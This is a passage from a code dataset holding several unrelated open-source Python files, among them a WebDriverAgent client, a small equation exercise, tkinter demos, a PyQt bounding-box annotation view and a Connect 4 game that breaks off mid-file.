usbmux.Usbmux()\n udid = _usbmux.get_single_device_udid()\n super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f\":{port}\")\n self.set_recover_handler(XCUITestRecover(udid))\n\n\nclass NanoClient(AppiumClient):\n \"\"\"\n Repo: https://github.com/nanoscopic/WebDriverAgent\n\n This repo changes a lot recently and the new version code drop the HTTP API to NNG\n So here use the old commit version\n https://github.com/nanoscopic/WebDriverAgent/tree/d07372d73a4cc4dc0b0d7807271e6d7958e57302\n \"\"\"\n\n def tap(self, x: int, y: int):\n \"\"\" fast tap \"\"\"\n self.request(POST, \"/wda/tap\", {\n \"x\": x,\n \"y\": y,\n })\n\n def fast_swipe(self,\n from_x: int,\n from_y: int,\n to_x: int,\n to_y: int,\n duration: float = .5):\n \"\"\" fast swipe, this method can not simulate back action by swipe left to right \"\"\"\n self.request(POST, \"/wda/swipe\", {\n \"x1\": from_x,\n \"y1\": from_y,\n \"x2\": to_x,\n \"y2\": to_y,\n \"delay\": duration})\n\n\nclass NanoUSBClient(NanoClient):\n def __init__(self, udid: str = None, port: int = 8100):\n if udid is None:\n _usbmux = usbmux.Usbmux()\n udid = _usbmux.get_single_device_udid()\n super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f\":{port}\")\n self.set_recover_handler(XCUITestRecover(udid))\n","repo_name":"openatx/wdapy","sub_path":"wdapy/_wdapy.py","file_name":"_wdapy.py","file_ext":"py","file_size_in_byte":12585,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"23220495010","text":"\"\"\"\nSolve a Linear Equation\nCreate a function that returns the value of x (the \"unknown\" in the equation). Each equation will be formatted like this:\n\nx + 6 = 12\nExamples\nsolve(\"x + 43 = 50\") ➞ 7\n\nsolve(\"x - 9 = 10\") ➞ 19\n\nsolve(\"x + 300 = 100\") ➞ -200\nNotes\n\"x\" will always be in the same place (you will not find an equation like 6 + x = 12).\nEvery equation will include either subtraction (-) or addition (+).\n\"x\" may be negative.\n\"\"\"\ndef solve(eq):\n \n a= eq.split(\" \")\n if a[1] == \"+\":\n return int(a[4]) - int(a[2])\n if a[1] == \"-\":\n return int(a[4]) + int(a[2]) \n \n\n\n\n\n#solve(\"x + 43 = 50\") #➞ 7\nsolve(\"x - 9 = 10\") #➞ 19\n#solve(\"x + 300 = 100\") #➞ -200\n","repo_name":"mankarali/TRAINING","sub_path":"EXAMPLES/EDABIT/EARLIER/33_solve_a_linear_equation.py","file_name":"33_solve_a_linear_equation.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"70562042338","text":"from tkinter import *\n\nfrom pyparsing import col\n\nroot = Tk()\n\ntulisan1 = Label(root, text=\"Halo...\")\ntulisan2 = Label(root, text=\"Nama saya Gabriel.\")\n\ntulisan1.grid(row=0, column=0)\ntulisan2.grid(row=1, column=1)\n\nroot.mainloop()","repo_name":"ifs21010-itdel/pg-python","sub_path":"gui/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6600015283","text":"# ImageView.py (vars-localize)\nfrom ui.ConceptSearchbar import ConceptSearchbar\nfrom ui.EntryTree import EntryTreeItem, update_imaged_moment_entry\nfrom PyQt5.QtCore import Qt, QPoint, QPointF, QRectF, QLineF\nfrom PyQt5.QtGui import QResizeEvent, QMouseEvent, QPixmap, QColor, QKeyEvent, QPen, QFont\nfrom PyQt5.QtWidgets import QGraphicsView, QGraphicsScene, QDialog, QVBoxLayout, QPushButton, QInputDialog, QMessageBox\n\nfrom ui.BoundingBox import BoundingBoxManager, GraphicsBoundingBox, SourceBoundingBox\nfrom ui.PropertiesDialog import PropertiesDialog\nfrom util import utils\nfrom util.requests import delete_box, create_box, modify_box, create_observation, fetch_image, \\\n get_all_parts, get_video_data\n\n__author__ = \"Kevin Barnard\"\n__copyright__ = \"Copyright 2019, Monterey Bay Aquarium Research Institute\"\n__credits__ = [\"MBARI\"]\n__license__ = \"GPL\"\n__maintainer__ = \"Kevin Barnard\"\n__email__ = \"kbarnard@mbari.org\"\n__doc__ = '''\n\nQGraphicsView custom widget for controlling image/localization graphics and input.\n\n@author: __author__\n@status: __status__\n@license: __license__\n'''\n\n\nclass ImageView(QGraphicsView):\n\n def __init__(self, parent=None):\n super(ImageView, self).__init__(parent)\n\n self.setStyleSheet('border: 0px;')\n self.setMinimumSize(1200, 675)\n self.setMouseTracking(True)\n\n self.image_scene = QGraphicsScene()\n self.setScene(self.image_scene)\n self.refit()\n\n self.observation_uuid = None\n self.observer = None\n self.moment = None\n self.observation_map = None\n self.enabled_observations = None\n\n self.pixmap_src = None\n self.pixmap_scalar = None\n self.pixmap_pos = None\n\n self.select_next = None\n self.select_prev = None\n\n # Graphical box selection\n self.pt_1 = None\n self.pt_2 = None\n self.selected_box = None\n self.hovered_box = None\n self.mouse_line_pen = QPen(Qt.red)\n self.mouse_hline = QLineF()\n self.mouse_vline = QLineF()\n\n self.hov_tl_rect = None\n self.hov_tr_rect = None\n self.hov_bl_rect = None\n self.hov_br_rect = None\n self.resize_type = None\n self.resize_offset = None\n\n self.hov_pt_1 = None\n\n def redraw(self):\n \"\"\"\n Redraw scene with all necessary components\n :return: None\n \"\"\"\n self.clear()\n self.refit()\n self.scene().setBackgroundBrush(QColor(0, 0, 0))\n if self.pixmap_src: # Image loaded, draw image + relevant components\n self.draw_pixmap(self.pixmap_src)\n\n self.draw_ancillary_data()\n\n if self.enabled_observations:\n for uuid, enabled in self.enabled_observations.items():\n if not enabled:\n continue\n for box in self.observation_map[uuid].metadata['boxes']:\n box_item = self.draw_bounding_box(box, self.observation_map[uuid].metadata['box_manager'])\n if self.selected_box == box:\n box_item.set_highlighted(True)\n if self.hovered_box == box:\n self.draw_drag_corners(box_item)\n\n # Draw crosshairs\n self.scene().addLine(self.mouse_hline, self.mouse_line_pen)\n self.scene().addLine(self.mouse_vline, self.mouse_line_pen)\n self.setCursor(Qt.BlankCursor)\n\n drag_rect = self.calc_drag_rect()\n if drag_rect: # Drag rectangle should be drawn\n top_left = self.get_scene_rel_point(QPointF(drag_rect.x(), drag_rect.y()))\n scaled_size = drag_rect.size() * self.pixmap_scalar\n self.scene().addRect(QRectF(top_left, scaled_size), QColor(0, 255, 0))\n else: # No image loaded\n text_item = self.scene().addText('No image loaded.', QFont('Courier New'))\n text_item.setDefaultTextColor(QColor(255, 255, 255))\n text_item.setPos(self.width() / 2 - text_item.boundingRect().width() / 2,\n self.height() / 2 - text_item.boundingRect().height() / 2)\n self.setCursor(Qt.ArrowCursor)\n\n def clear(self):\n \"\"\"\n Empty everything from the scene, reset bounding box managers\n :return: None\n \"\"\"\n self.scene().clear()\n if self.observation_map:\n for box_manager in [entry.metadata['box_manager'] for entry in self.observation_map.values()]:\n box_manager.clear()\n\n def set_entry(self, entry: EntryTreeItem):\n \"\"\"\n Set the selected entry, load associated data\n :param entry: Entry tree item to from\n :return: None\n \"\"\"\n if entry.metadata['type'] == 'imaged_moment':\n entry.setExpanded(True)\n if entry != self.moment:\n self.load_moment(entry)\n self.select_observation('all')\n elif entry.metadata['type'] == 'observation':\n if entry.parent() != self.moment:\n self.load_moment(entry.parent())\n self.select_observation(entry.metadata['uuid'])\n\n def load_moment(self, entry: EntryTreeItem):\n \"\"\"\n Load pertinent data from imaged moment entry\n :param entry: Entry tree item of imaged moment\n :return: None\n \"\"\"\n self.moment = entry\n if 'cached_image' not in entry.metadata.keys(): # Cache pixmap\n entry.metadata['cached_image'] = fetch_image(entry.metadata['url'])\n self.set_pixmap(entry.metadata['cached_image']) # Set pixmap\n observation_entries = [entry.child(idx) for idx in range(entry.childCount())]\n self.observation_map = dict([(entry.metadata['uuid'], entry) for entry in observation_entries]) # observation uuid -> entry tree item\n self.enabled_observations = dict()\n for observation_entry in observation_entries:\n uuid = observation_entry.metadata['uuid']\n observation_entry.metadata['box_manager'] = BoundingBoxManager() # Construct new bounding box manager\n observation_entry.metadata['box_manager'].set_box_click_callback(self.show_box_properties_dialog)\n self.enabled_observations[uuid] = True\n\n def draw_drag_corners(self, box: GraphicsBoundingBox):\n length = 10\n tl_rect = self.scene().addRect(box.x(), box.y(), length, length, pen=box.color.lighter())\n tr_rect = self.scene().addRect(box.x() + box.width - length, box.y(), length, length, pen=box.color.lighter())\n bl_rect = self.scene().addRect(box.x(), box.y() + box.height - length, length, length, pen=box.color.lighter())\n br_rect = self.scene().addRect(box.x() + box.width - length, box.y() + box.height - length, length, length, pen=box.color.lighter())\n\n self.hov_tl_rect = tl_rect.rect()\n self.hov_tr_rect = tr_rect.rect()\n self.hov_bl_rect = bl_rect.rect()\n self.hov_br_rect = br_rect.rect()\n\n def set_pixmap(self, pixmap):\n \"\"\"\n Set source pixmap, clear corner points\n :return: None\n \"\"\"\n self.pixmap_src = pixmap\n self.pt_1 = None\n self.pt_2 = None\n\n def select_observation(self, observation_uuid: str):\n \"\"\"\n Select and display bounding boxes for specified observation only\n :param observation_uuid: Observation UUID to source\n :return: None\n \"\"\"\n for uuid in self.enabled_observations.keys():\n self.enabled_observations[uuid] = True if (observation_uuid == uuid or observation_uuid == 'all') else False\n self.observation_uuid = observation_uuid if observation_uuid != 'all' else None\n\n def refit(self):\n \"\"\"\n Refit sceneRect to fit entire view\n :return: None\n \"\"\"\n self.setSceneRect(0, 0, self.width(), self.height())\n\n def draw_pixmap(self, pixmap: QPixmap):\n \"\"\"\n Scale and draw pixmap in scene\n :param pixmap: Pixmap object to draw\n :return: None\n \"\"\"\n if not pixmap or pixmap.isNull():\n return\n scaled_pixmap = pixmap.scaled(self.width(), self.height(), Qt.KeepAspectRatio)\n self.pixmap_scalar = scaled_pixmap.width() / pixmap.width()\n self.pixmap_pos = QPointF(\n self.width() / 2 - scaled_pixmap.width() / 2,\n self.height() / 2 - scaled_pixmap.height() / 2)\n\n pixmap_item = self.scene().addPixmap(scaled_pixmap)\n pixmap_item.setPos(self.pixmap_pos)\n return pixmap_item\n\n def draw_ancillary_data(self):\n \"\"\"\n Draw ancillary data on the image, if there is any\n :return: None\n \"\"\"\n if 'ancillary_data' in self.moment.metadata.keys():\n ancillary_data = self.moment.metadata['ancillary_data']\n\n text_dict = {}\n\n if 'depth_meters' in ancillary_data:\n text_dict['Depth (m): {:<10.2f}'] = ancillary_data['depth_meters']\n\n if 'latitude' in ancillary_data:\n text_dict['Latitude: {:<10.3f}'] = ancillary_data['latitude']\n\n if 'longitude' in ancillary_data:\n text_dict['Longitude: {:<10.3f}'] = ancillary_data['longitude']\n\n if 'recorded_date' in self.moment.metadata.keys():\n text_dict['Recorded: {:<20}'] = self.moment.metadata['recorded_date'].replace('T', ' ').replace('Z', '')\n\n if 'video_data' not in self.moment.metadata.keys():\n video_data = get_video_data(self.moment.metadata['video_reference_uuid'])\n self.moment.metadata['video_data'] = video_data\n\n if self.moment.metadata['video_data'] and 'uri' in self.moment.metadata['video_data']:\n video_sequence_name = self.moment.metadata['video_data']['uri'].split(':')[-1]\n text_dict['Video: {:<10}'] = video_sequence_name\n\n text_str = ' '.join(k.format(v) for k, v in text_dict.items())\n text_item = self.scene().addText(text_str, QFont('Courier New'))\n text_item.setDefaultTextColor(QColor(255, 255, 255))\n text_item.setPos(10, self.height() - text_item.boundingRect().height() - 10)\n\n def draw_bounding_box(self, box_src: SourceBoundingBox, manager: BoundingBoxManager):\n \"\"\"\n Draw a bounding box in the scene, add to box manager\n :param box_src: Source bounding box to add\n :param manager: Bounding box manager\n :return: Graphical bounding box item\n \"\"\"\n box_pos = self.get_scene_rel_point(QPointF(box_src.x(), box_src.y()))\n box_item = manager.make_box(\n box_pos.x(),\n box_pos.y(),\n self.pixmap_scalar * box_src.width(),\n self.pixmap_scalar * box_src.height(),\n box_src.label,\n box_src)\n self.scene().addItem(box_item)\n return box_item\n\n def get_im_rel_point(self, pt: QPoint):\n \"\"\"\n Convert a scene-relative point to an image-relative point\n :return: Point relative to the image\n \"\"\"\n return QPointF(\n (pt.x() - self.pixmap_pos.x()) / self.pixmap_scalar,\n (pt.y() - self.pixmap_pos.y()) / self.pixmap_scalar,\n )\n\n def get_scene_rel_point(self, pt: QPointF):\n \"\"\"\n Convert an image-relative point to a scene-relative point\n :return: Point relative to the scene\n \"\"\"\n return QPoint(\n self.pixmap_scalar * pt.x() + self.pixmap_pos.x(),\n self.pixmap_scalar * pt.y() + self.pixmap_pos.y()\n )\n\n def show_box_properties_dialog(self, box: GraphicsBoundingBox):\n \"\"\"\n Construct a dialog for bounding box properties\n :param box: Graphical bounding box object to manipulate\n :return: None\n \"\"\"\n self.selected_box = box.source\n self.redraw()\n\n box_json_before = box.source.get_json()\n box_label_before = box.source.label\n\n dialog = PropertiesDialog(box.source)\n dialog.setup_form(self.pixmap_src, self.redraw)\n dialog.set_delete_callback(self.delete_box)\n\n dialog.setModal(True)\n dialog.exec_()\n\n box_json_after = box.source.get_json()\n if box_json_after != box_json_before:\n box.source.observer = self.observer # Update observer field\n box.source.strength = utils.get_observer_confidence(box.source.observer) # Update strength field\n modify_box(box_json_after, box.source.observation_uuid, box.source.association_uuid) # Call modification request\n update_imaged_moment_entry(self.moment) # Update tree\n\n self.pt_1 = None\n self.pt_2 = None\n\n self.selected_box = None\n self.redraw()\n\n def delete_box(self, box: SourceBoundingBox):\n \"\"\"\n Delete a box from the source, save\n :param box: Source bounding box to delete\n :return: None\n \"\"\"\n source_boxes = self.observation_map[box.observation_uuid].metadata['boxes']\n if box in self.observation_map[box.observation_uuid].metadata['boxes']: # Protect\n source_boxes.remove(box)\n delete_box(box.association_uuid) # Call deletion request\n update_imaged_moment_entry(self.moment) # Update tree\n\n def calc_drag_rect(self):\n \"\"\"\n Compute the drag selection rectangle if possible\n :return: Rectangle if possible, else None\n \"\"\"\n if self.pt_1 and self.pt_2:\n x = self.pt_1.x()\n y = self.pt_1.y()\n w = self.pt_2.x() - x\n h = self.pt_2.y() - y\n\n if w < 0:\n w = -w\n x = self.pt_2.x()\n if h < 0:\n h = -h\n y = self.pt_2.y()\n\n return QRectF(x, y, w, h)\n return None\n\n def calc_crop_rect(self, drag_rect: QRectF):\n \"\"\"\n Crop a rectangle to the bounds of the image\n :param drag_rect: Drag rectangle\n :return: Cropped rectangle\n \"\"\"\n x = drag_rect.x()\n y = drag_rect.y()\n w = drag_rect.width()\n h = drag_rect.height()\n if x < 0:\n w += x\n x = 0\n if y < 0:\n h += y\n y = 0\n if x + w > self.pixmap_src.width():\n w = self.pixmap_src.width() - x\n if y + h > self.pixmap_src.height():\n h = self.pixmap_src.height() - y\n\n return QRectF(x, y, w, h)\n\n def prompt_concept(self):\n \"\"\"\n Prompt for a concept selection and return selection\n :return: Concept selected\n \"\"\"\n dialog = QDialog()\n dialog.setLayout(QVBoxLayout())\n dialog.setWindowTitle('Specify a concept')\n dialog.setWindowFlag(Qt.WindowCloseButtonHint, False)\n search = ConceptSearchbar()\n\n submit_button = QPushButton('Submit')\n submit_button.setEnabled(False)\n submit_button.pressed.connect(dialog.close)\n\n concept_selected = ''\n\n def update_concept_selected(concept):\n nonlocal concept_selected\n nonlocal submit_button\n concept_selected = concept\n submit_button.setEnabled(True)\n\n search.set_callback(update_concept_selected)\n\n dialog.layout().addWidget(search)\n dialog.layout().addWidget(submit_button)\n\n dialog.setModal(True)\n dialog.exec_()\n\n return concept_selected\n\n def make_new_observation(self, concept):\n \"\"\"\n Create a new observation of the specified concept\n :param concept: Concept to observe\n :return: Observation JSON response\n \"\"\"\n kwargs = dict()\n fields = self.moment.metadata.keys()\n if 'timecode' in fields:\n kwargs['timecode'] = self.moment.metadata['timecode']\n if 'elapsed_time_millis' in fields:\n kwargs['elapsed_time_millis'] = self.moment.metadata['elapsed_time_millis']\n if 'recorded_date' in fields:\n kwargs['recorded_timestamp'] = self.moment.metadata['recorded_date']\n\n observation = create_observation( # Call observation creation request\n self.moment.metadata['video_reference_uuid'],\n concept,\n self.observer,\n **kwargs\n )\n\n self.moment.treeWidget().editable_uuids.add(observation['observation_uuid'])\n\n self.reload_moment()\n\n return observation\n\n def reload_moment(self):\n \"\"\"\n Fully reload the imaged moment.\n :return: None\n \"\"\"\n image = self.moment.metadata['cached_image'] # Backup image, so no re-fetch\n self.moment.treeWidget().load_imaged_moment_entry(self.moment) # Reload the tree\n self.moment.metadata['cached_image'] = image\n self.load_moment(self.moment) # Reload imaged moment\n\n def handle_new_box(self, box: SourceBoundingBox):\n \"\"\"\n Create a new box, creating new observation if needed\n :param box: Source bounding box\n :return: None\n \"\"\"\n uuid = self.observation_uuid\n if not uuid: # Imaged moment selected\n new_concept = self.prompt_concept()\n if not new_concept: # No concept was specified\n return\n observation = self.make_new_observation(new_concept)\n box.set_label(new_concept)\n uuid = observation['observation_uuid']\n\n box.observation_uuid = uuid\n self.draw_bounding_box(box, self.observation_map[uuid].metadata['box_manager'])\n self.observation_map[uuid].metadata['boxes'].append(box)\n response_json = create_box(box.get_json(), uuid, to_concept=box.part)\n box.association_uuid = response_json['uuid']\n update_imaged_moment_entry(self.moment) # Update tree\n\n def reset_mouse(self):\n self.pt_1 = None\n self.pt_2 = None\n self.hov_pt_1 = None\n self.resize_offset = None\n self.resize_type = None\n self.redraw()\n\n def mouseReleaseEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n new_rect = self.calc_drag_rect()\n if new_rect:\n new_rect = self.calc_crop_rect(new_rect)\n box_json = {\n 'x': int(new_rect.x()),\n 'y': int(new_rect.y()),\n 'width': int(new_rect.width()),\n 'height': int(new_rect.height()),\n 'image_reference_uuid': self.moment.metadata['image_reference_uuid']\n }\n\n concept = self.observation_map[self.observation_uuid].metadata['concept'] if self.observation_uuid else ''\n observer = self.observer\n\n acceptable_parts = ['self'] + get_all_parts()\n part, part_accepted = QInputDialog.getItem(self, 'Part Selection', 'Select a part',\n acceptable_parts,\n current=0)\n if not part_accepted:\n self.reset_mouse()\n return\n\n if part not in acceptable_parts:\n QMessageBox.critical(self, 'Error: Bad Part',\n 'Bad concept part: \"{}\". Localization not created.'.format(part))\n self.reset_mouse()\n return\n\n new_src_box = SourceBoundingBox(\n box_json,\n concept,\n observer,\n utils.get_observer_confidence(observer),\n part=part\n )\n if new_src_box.width() * new_src_box.height() > 100:\n self.handle_new_box(new_src_box)\n\n if self.resize_type:\n modify_box(self.hovered_box.get_json(), self.hovered_box.observation_uuid, self.hovered_box.association_uuid)\n\n self.reset_mouse()\n\n def mousePressEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n self.pt_1 = self.get_im_rel_point(event.pos())\n if self.hovered_box:\n corner_box = None\n self.hov_pt_1 = self.get_im_rel_point(event.pos())\n if self.hov_tl_rect.contains(event.pos()):\n self.resize_type = 1\n corner_box = self.hov_tl_rect\n elif self.hov_tr_rect.contains(event.pos()):\n self.resize_type = 2\n corner_box = self.hov_tr_rect\n elif self.hov_bl_rect.contains(event.pos()):\n self.resize_type = 3\n corner_box = self.hov_bl_rect\n elif self.hov_br_rect.contains(event.pos()):\n self.resize_type = 4\n corner_box = self.hov_br_rect\n else:\n self.hov_pt_1 = None\n\n if corner_box:\n self.pt_1 = None\n x, y, _, _ = corner_box.getRect()\n corner = self.get_im_rel_point(QPoint(x, y))\n self.resize_offset = self.hov_pt_1 - corner\n\n def mouseMoveEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n self.pt_2 = self.get_im_rel_point(event.pos())\n if self.hovered_box:\n if self.resize_type == 1:\n new_tl_corner = (self.pt_2 - self.resize_offset).toPoint()\n if new_tl_corner.x() < 0:\n new_tl_corner.setX(0)\n if new_tl_corner.y() < 0:\n new_tl_corner.setY(0)\n self.hovered_box.setTopLeft(new_tl_corner)\n elif self.resize_type == 2:\n new_tr_corner = (self.pt_2 - self.resize_offset).toPoint()\n new_tr_corner.setX(new_tr_corner.x() + 2 * self.resize_offset.x())\n if new_tr_corner.x() > self.pixmap_src.width():\n new_tr_corner.setX(self.pixmap_src.width())\n if new_tr_corner.y() < 0:\n new_tr_corner.setY(0)\n self.hovered_box.setTopRight(new_tr_corner)\n elif self.resize_type == 3:\n new_bl_corner = (self.pt_2 - self.resize_offset).toPoint()\n new_bl_corner.setY(new_bl_corner.y() + 2 * self.resize_offset.y())\n if new_bl_corner.x() < 0:\n new_bl_corner.setX(0)\n if new_bl_corner.y() > self.pixmap_src.height():\n new_bl_corner.setY(self.pixmap_src.height())\n self.hovered_box.setBottomLeft(new_bl_corner)\n elif self.resize_type == 4:\n new_br_corner = (self.pt_2 - self.resize_offset).toPoint()\n new_br_corner.setX(new_br_corner.x() + 2 * self.resize_offset.x())\n new_br_corner.setY(new_br_corner.y() + 2 * self.resize_offset.y())\n if new_br_corner.x() > self.pixmap_src.width():\n new_br_corner.setX(self.pixmap_src.width())\n if new_br_corner.y() > self.pixmap_src.height():\n new_br_corner.setY(self.pixmap_src.height())\n self.hovered_box.setBottomRight(new_br_corner)\n\n self.mouse_hline.setLine(0, event.y(), self.scene().width(), event.y())\n self.mouse_vline.setLine(event.x(), 0, event.x(), self.scene().height())\n\n if self.enabled_observations and not self.resize_type:\n for uuid, enabled in self.enabled_observations.items():\n if enabled:\n hov_box_item = self.observation_map[uuid].metadata['box_manager'].get_box_hovered(event.pos())\n if hov_box_item:\n self.hovered_box = hov_box_item.source\n else:\n self.hovered_box = None\n\n self.redraw()\n\n def mouseDoubleClickEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n self.pt_1 = None\n self.pt_2 = None\n for uuid, enabled in self.enabled_observations.items():\n if enabled:\n self.observation_map[uuid].metadata['box_manager'].check_box_click(event.pos())\n\n def resizeEvent(self, event: QResizeEvent) -> None:\n self.redraw()\n\n def keyPressEvent(self, event: QKeyEvent) -> None:\n if event.key() == Qt.Key_Up:\n self.select_prev()\n elif event.key() == Qt.Key_Down:\n self.select_next()\n","repo_name":"mbari-org/vars-localize","sub_path":"ui/ImageView.py","file_name":"ImageView.py","file_ext":"py","file_size_in_byte":24552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39628545352","text":"n,m = tuple(map(int,input().split()))\n\nans =[]\nvisited = [False for _ in range(n+1)]\n\ndef print_combination():\n for e in ans:\n print(e, end=\" \")\n print()\n\n\ndef dfs(curr_num, cnt):\n if curr_num == n+1:\n if cnt == m:\n print_combination()\n return\n\n ans.append(curr_num)\n dfs(curr_num+1,cnt+1)\n ans.pop()\n\n dfs(curr_num+1,cnt)\n\n return\n\ndfs(1,0) ","repo_name":"nbbeom/pythonAlgorithms","sub_path":"backtracking/n개중m개뽑기.py","file_name":"n개중m개뽑기.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32589974831","text":"#READ THIS: \n#Repl.it is a little buggy when it comes to tkinter. \n\n####################\n#Code2College Post Assessment Assignment\n#Start Date: Nov 4th, 2022\n#End Date: Nov 12th, 2022\n#Total Time Spent: About 2 Hours\n#Name: Evgeniy Agaev\n#Project Description: Working Connect 4 Game using tkinter gui framework. \n####################\n\n#Take turns between players to play fair. \n\n\nimport random\nimport tkinter\nfrom tkinter import *\nfrom PIL import ImageTk, Image\n\n\n\ndef print_gameboard(): #function to print the gameboard in the terminal\n for row in gameboard:\n for col in row:\n print(col, end=\" \")\n print(\" \")\n\n\ndef clear_gameboard(): #clears gameboard\n for row in range(width):\n for col in range(height):\n gameboard[row][col] = '-'\n \n\ndef drop_piece(collumn, player_token): #drops a piece downt the collumn and ends on top of the last piece.\n for row in range(0, height):\n if(gameboard[row][collumn] != '-'):\n gameboard[row -1][collumn] = player_token \n return (row - 1) #returns the row the piece was dropped on. \n \n\n gameboard[height -1][collumn] = player_token\n return (height - 1) #returns the row the piece was dropped on.\n\ndef check_winner(player_token): #checks for the winner\n for row in range(0, height):\n for col in range(0, width): \n\n #The pattern for the \"winning\" combitnations is that all combinations (horizontal, vertical, and diagonal) all\n # had similar starting positions. \n\n\n if(gameboard[row][col] == player_token): #first iterating through each token checking if the token is one team's.\n \n if(row <= 2): #this is to check for all tokens in the top 3 rows of the board. \n #this method checks for \"vertical\" lines in 4 lines\n \n if (gameboard[row][col] == gameboard[row + 1][col]) and (gameboard[row + 2][col] == gameboard[row + 3][col]) and(gameboard[row + 1][col] == gameboard[row + 2][col]):\n #checks 4 tiles to see if they won. \n return True\n if(col <= 2): #this is for horiztonal lines\n if(gameboard[row][col] == gameboard[row][col + 1]) and (gameboard[row][col + 2] == gameboard[row][col + 3]) and(gameboard[row][col + 1] == gameboard[row][col + 2]):\n\n \n \n \n return True\n \n if(row <=2) and (col <=2): #checking if negative diagonal is the winning combination. \n #checks if starts in uppermost left corner. \n if (gameboard[row][col] == gameboard[row + 1][col + 1]) and (gameboard[row + 2][col + 2] == gameboard[row + 3][col + 3]) and(gameboard[row + 1][col + 1] == gameboard[row + 2][col + 2]):\n \n return True\n if(row<= 2) and (col >=3): #checking if positive diagonal is the winning combination. \n #checks if the start is in the uppermost right corner and counts down from there. \n if (gameboard[row][col] == gameboard[row + 1][col - 1]) and (gameboard[row + 2][col - 2] == gameboard[row + 3][col - 3]) and(gameboard[row + 1][col-1] == gameboard[row + 2][col -2]):\n \n return True\n \n return False\n\n\ndef play_pressed():\n \n global buttons \n for widget in root.winfo_children(): #destroys all widgets and wipes the screen clean. \n widget.destroy()\n root.configure(bg=\"#d9d9d9\") #sets default background color\n \n #each of these buttons connect to a row. If they are clicked, then they are connected to a \"drop_piece\" function.\n row_1 = tkinter.Button(root, text=\"Row 1\", command=lambda b= 0 : drop_piece_tkinter(b)) \n row_2 = tkinter.Button(root, text=\"Row 2\", command=lambda b= 1 : drop_piece_tkinter(b))\n row_3 = tkinter.Button(root, text=\"Row 3\", command=lambda b= 2 : drop_piece_tkinter(b))\n row_4 = tkinter.Button(root, text=\"Row 4\", command=lambda b= 3 : drop_piece_tkinter(b))\n row_5 = tkinter.Button(root, text=\"Row 5\", command=lambda b= 4 : drop_piece_tkinter(b))\n row_6 = tkinter.Button(root, text=\"Row 6\", command=lambda b= 5 : drop_piece_tkinter(b))\n buttons = [row_1, row_2, row_3, row_4, row_5, row_6]\n\n#sets up all the buttons in a grid line, and makes them size with the screen.\n row_1.grid(column=0, row= 0, sticky = tkinter.EW)\n row_2.grid(column=1, row = 0, sticky= tkinter.EW)\n row_3.grid(column=2, row= 0, sticky = tkinter.EW)\n row_4.grid(column=3, row = 0, sticky= tkinter.EW)\n row_5.grid(column=4, row= 0, sticky = tkinter.EW)\n row_6.grid(column=5, row = 0, sticky= tkinter.EW) \n\n root.grid_columnconfigure((0,1,2,3,4,5), weight=1) #adds weight to each of the collumns, so they size with the window.\n\n for i in range(width): #sets the placeholder items in a grid, to create a more \"realistic image\" to the players\n for j in range(height):\n placeholder = tkinter.Label(root, image = placeholder_token)\n placeholder.grid(column=i, row = (j+ 1), pady= 20)\n \n \n\ndef drop_piece_tkinter(b): #drops the piece on the screen. \n global round\n global buttons\n \n \n if (round + first_player)%2 ==0: #round is set and depending on each round, the game will either drop a red or a black piece.\n #every round should be different.\n\n \n \n \n \n\n player_move = drop_piece(b, 'X') + 1 #sets player move as a value. \n \n label = tkinter.Label(root, image=red_token)\n label.grid(column = b, row= player_move) #places the piece based on the player_move\n round = round + 1 #increments the round by 1\n if(check_winner('X')): #checks the winnder each round. \n for widget in root.winfo_children(): #destoys everything on the screen. \n widget.destroy()\n root.configure(bg='#c41a1a') #sets background to red\n win_label = tkinter.Label(root, text=\"Red won\", font=\"Helvetica 25 bold\") #red won label\n win_label.place(relx= 0.5, rely= 0.5, anchor=tkinter.CENTER) #places label in center\n\n #a play again button connects to the play_pressed function before. \n play_again_button = tkinter.Button(root, text=\"Play Again?\", command=play_pressed)\n play_again_button.place(relx=0.5, rely=0.4, anchor=tkinter.CENTER)\n clear_gameboard() #clears the \"data framework\" of the board array. \n \n else:\n player_move = drop_piece(b, 'O') + 1 #drops piece with the black token on the screen and the '0' token in the array. \n \n\n label = tkinter.Label(root, image=black_token)\n label.grid(column = b, row= player_move) #places a black token based on player move. \n round = round + 1 #increments the round\n if(check_winner('O')): #checks if black won\n for widget in root.winfo_children():\n widget.destroy() #if black won, everything on screen is destroyed\n root.configure(bg='#525252') #dark grey background. \n win_label = tkinter.Label(root, text=\"Black won\", font=\"Helvetica 25 bold\") #black won\n win_label.place(relx= 0.5, rely= 0.5, anchor=tkinter.CENTER)\n play_again_button = tkinter.Button(root, text=\"Play Again?\", command=play_pressed) #play again button\n play_again_button.place(relx=0.5, rely=0.4, anchor=tkinter.CENTER)\n clear_gameboard() #clears the virtual board. \n \n \n\n\n\n############## \n\n#really the entire program loop happens below this line. \n#this is the gameboard\ngameboard = [['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-', '-']]\ngameboard_size = width, height = len(gameboard), len(gameboard[0]) #sets width and height of board. \nfirst_player = int(random.randrange(50,101)/50 +0.5) #half chance that black or red is first.\n\nround = 1 #sets the round to be 1\nbuttons = None #buttons for each row. \n\nroot = tkinter.Tk() #entire window\nroot.title(\"Connect 4\") #title\nroot.geometry(\"500x500\") #size of window\nbt_img = Image.open(\"Tokens/Black_Token.png\") #gets the black token png file. \n\nbt_img = bt_img.resize((50,50), Image.ANTIALIAS) #resizes the token to be a little smaller. \n\nblack_token = ImageTk.PhotoImage(bt_img) #sets the black token to be actually used in the program\n\n\n#this section does the same just for 